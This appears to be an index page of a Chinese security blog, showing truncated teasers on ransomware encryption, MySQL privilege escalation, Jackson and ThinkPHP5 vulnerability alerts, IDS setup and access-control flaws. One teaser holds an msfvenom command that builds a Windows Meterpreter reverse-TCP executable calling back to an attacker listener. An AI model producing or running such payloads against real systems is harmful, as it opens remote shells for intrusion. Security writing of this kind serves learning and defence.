最近有同学问我为什么家网速会这慢,我根据同学提供的信息分析出是WIFI万能钥匙搞的鬼。提到WiFi万能钥匙,大家都很熟悉了,利用这个APP基本上很大一部分的无线密码都可以轻松“破解”掉,绝对的蹭网神器...
勒索软件加密方式
勒索软件的加密方式spora勒索软件加密方式以上加密方式的说明:1 RSA 加密方式为非对称加密,需要公钥和私钥各不相同。AES对称加密,加密解密使用同一个密钥。2 ...
Mysql数据库反弹端口连接提权
Mysql数据库反弹端口连接提权在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令,在一般的情况下,也就放弃...
反弹入侵(几乎适用于任何windows主机)((请勿用于非法操作!!!))
root@kali:~# msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=1234 --format=exe&...
Gartner:网络信息安全投入依然不在中国政企客户优先投入之列
2017年2月,Gartner发布的《2017年CIO议程》调查报告显示,中国政企客户对安全的投入优先级低于国际平均水平,不在其优先投入之列。这份报告访谈了全球93个国家2598名CIO,其中75人来...
继Struts2漏洞,Jackson漏洞来袭
1、时间:2017-4-172、漏洞: Jackson框架Java反序列化远程代码执行漏洞,Jackson可以轻松的将Java对象转换成json对象和xml文档,同样也可以将json、xml...
snort for snorby 入侵检测系统搭建
搭建一个入侵检测系统简单介绍一下:Snorby是一个Ruby on Rails的Web应用程序,网络安全监控与目前流行的入侵检测系统(Snort的项目Suricata和Sagan)的接口。该项目的目标...
网络安全分析和公有云使用的安全性
楼主从一个故事讲起,让我想起之前超级计算机被入侵的事情。首先网络安全一直不是一件简单事情,而且大家对黑客入侵一直抱有神秘未知的认知。我们可以把复杂的事情进行拆解分析,首先入侵面我们可以分为OSI七层,...
拦截相同IP连接数过大的会话请求
拦截相同IP连接数过大的会话请求系统环境:Centos 6.5 x64 为避免Linux主机遭受攻击,需要定时查看主机上的会话连接数。对于同一IP会话数过高的,肯定判断为不正常...
浅谈越权漏洞
本文出自 “eth10” 博客 越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删...
近期会分享飓风科技这几年来的创业经历和走过的路
敬请期待和关注感谢对本公众号关注的所有粉丝对飓风网络安全不离不弃我们正在回归 继续火力全开奋勇前行 本文始发于微信公众号(飓风网络安全):近期会分享飓风科技这几年来的创业经历和走过的路
ThinkPHP5 高危漏洞预警
老一点的TP5.1: // 获取控制器名 $controller ...
25587